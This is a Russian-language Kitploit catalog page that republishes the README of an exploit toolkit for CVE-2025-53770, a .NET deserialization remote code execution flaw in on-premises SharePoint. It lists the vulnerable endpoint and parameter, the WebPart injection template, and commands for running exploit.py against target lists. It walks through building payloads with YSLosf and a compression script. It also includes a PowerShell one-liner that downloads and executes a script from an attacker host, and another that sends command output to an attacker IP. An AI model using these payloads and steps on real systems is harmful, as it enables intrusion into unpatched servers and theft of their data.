Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-53770-Exploit — Инструмент для эксплуатации инъекций WebPart в SharePoint | Kitploit
Инструменты/GitHubGitHub/soltanali0/cve-2025-53770-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки
GitHubsoltanali0/cve-2025-53770-exploit

CVE-2025-53770-Exploit

Инструмент для эксплуатации инъекций WebPart в SharePoint

Репозиторий
313771610 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

📌 Инструментарий эксплуатации инъекции WebPart в SharePoint

🍕 Инструмент для эксплуатации инъекции WebPart в SharePoint через ToolPane.aspx, приводящей к десериализации .NET и потенциальному удалённому выполнению кода (RCE).

Разработано: @GOTOCVE


🌍 Обзор

Этот инструмент эксплуатирует уязвимость в Microsoft SharePoint (on-premises), которая позволяет аутентифицированным пользователям злоупотреблять конечной точкой ToolPane.aspx и внедрять вредоносные WebPart-компоненты, содержащие сериализованные объекты .NET, сжатые GZIP.

Внедрённый объект помещается в параметр MSOTlPn_SelectedWpId и встраивается в поддельный WebPart (например, <Scorecard:ExcelDataSet>), который анализируется и десериализуется серверной частью SharePoint.


⚙️ Возможности

  • ✅ Автоматическая проверка конечной точки (ToolPane.aspx)
  • ✅ Внедрение пользовательских пейлоадов (объекты .NET LosFormatter в кодировке GZIP+Base64)
  • ✅ Поддержка прокси для Burp/ZAP
  • ✅ Поддержка ввода пейлоада из файла или напрямую

🧪 Поддерживаемые версии

ПродуктЗатронутые версии
SharePoint Server 201616.0.4351.1000 - 16.0.5508.1000
SharePoint Server 201916.0.10337.12109 - 16.0.10417.20027

⚡ Сводка по уязвимости

ПолеЗначение
КомпонентMicrosoft SharePoint (On-Premises)
Конечная точка/layouts/15/ToolPane.aspx
ПараметрMSOTlPn_DWP
WebPart<Scorecard:ExcelDataSet CompressedDataTable>
ПроблемаНебезопасная десериализация .NET
CVECVE-2025-53770

🧰 Компоненты инструментария

✅ 1. exploit.py

Многопоточный инструмент эксплуатации SharePoint для CVE-2025-53770.

  • Определяет SharePoint и его версию
  • Проверяет доступ к /ToolPane.aspx
  • Отправляет вредоносный WebPart-пейлоад

✅ 2. YSLosf.exe

Генератор пейлоадов и десериализатор LosFormatter.

изображение

🚀 Использование

🔸 Базовое использование

python3 exploit.py -u https://target -p payload.txt

🔸 Несколько целей

python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080

🔸 Все аргументы

АргументОписание
-uURL цели (например, https://sp.company.local)
-fФайл со списком URL целей (по одному на строку)
-pФайл пейлоада или готовая строка Base64 GZIP
--proxyНеобязательный прокси (например, http://127.0.0.1:8080)
-tТаймаут в секундах (по умолчанию: 15)

🔧 Требования

  • Python 3.10
  • Установите зависимости:
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
  • Среда выполнения .NET 4.8 (для запуска YSLosf.exe)

💥 Структура пейлоада

Ваш пейлоад должен быть:

  1. Объектом .NET (например, DataSet, ObjectDataProvider)
  2. Сериализованным с помощью LosFormatter или BinaryFormatter
  3. Закодированным в Base64
  4. Сжатым GZIP

Встроен в WebPart следующим образом:

<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>

🛠 Генерация пейлоадов с помощью YSLosf

Шаг 1: Создание файла пейлоада

Поместите вашу команду (например, reverse shell) в payload.txt:

powershell -nop -c iwr http://attacker/shell.ps1 | iex

Шаг 2: Генерация Base64-пейлоада

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j

Base64 encoded:
L3dFRkJXWnNkRzFq

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc

Шаг 3: Сжатие и финализация

# compress.py
import gzip, base64

with open("base64.txt", "rb") as f:
    b64 = base64.b64decode(f.read())
    gz = gzip.compress(b64)
    # print(base64.b64encode(gz).decode())
    encoded = base64.b64encode(gz).decode()

with open("payload-final.txt", "w") as out_file:
    out_file.write(encoded)

Сохраните вывод в payload-final.txt и передайте его инструменту эксплуатации.


🧵 Поддерживаемые gadget-цепочки

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Windows.Data.ObjectDataProvider
  • System.Web.UI.LosFormatter

📡 Примечания о выводе команд

Эта уязвимость не возвращает вывод (например, ipconfig) в ответе. Вам необходимо:

  • Использовать пейлоады reverse shell
  • Либо выгружать вывод:
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"

⚠️ Правовое предупреждение

Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности.

Не используйте его против систем без явного разрешения. Неправильное использование может быть незаконным и неэтичным.


🔍 Обнаружение

Если уязвимый сервер принимает пейлоад и отражает MSOTlPn_SelectedWpId или отображает страницу с внедрённым WebPart, он, скорее всего, эксплуатируем. Отсутствие вывода означает, что десериализация не удалась или сервер уже пропатчен.


🛑 Правовое разъяснение и область применения инструмента

Этот инструмент не доставляет и не выполняет шеллкод или веб-шеллы. Он лишь демонстрирует эксплуатацию уязвимости десериализации .NET (CVE-2025-53770) через уязвимую конечную точку ToolPane.aspx с использованием вредоносной структуры WebPart, содержащей сжатый GZIP объект .NET.

🔹 Назначение: помочь исследователям, red team-специалистам и защитникам обнаруживать уязвимые серверы SharePoint и безопасно тестировать вектор инъекции с помощью собственных пейлоадов.

🔹 Пейлоады: инструмент требует, чтобы пользователи самостоятельно генерировали пейлоады (например, с помощью YSLosf.exe), которые встраиваются в WebPart в виде GZIP-строк в кодировке Base64.
Пользователь несёт ответственность за выбор подходящих и этичных пейлоадов (например, безвредный запуск calc.exe, beacon-маркеры и т. п.).

🔹 Reverse Shell / Web Shell не включены:
Хотя злоумышленники в реальных атаках могут размещать веб-шеллы вроде spinstall0.aspx, этот проект не содержит подобной логики.
Если вы планируете доставку reverse shell, вы должны вручную сгенерировать собственный пейлоад и нести полную ответственность за его использование.

Star History

Star History Chart

📢 Больше эксплойтов и CVE?

Присоединяйтесь к @GOTOCVE в Telegram:

  • 🔍 Еженедельные разборы CVE
  • 🧠 Подробные разборы эксплойтов
  • 🛡 Контент для Red и Blue Team
  • 💣 Реальные PoC и советы по обнаружению

📬 Контакты

Автор: Ali Soltani
По вопросам исследований или сообщениям об ошибках пишите в Telegram

Скачать инструмент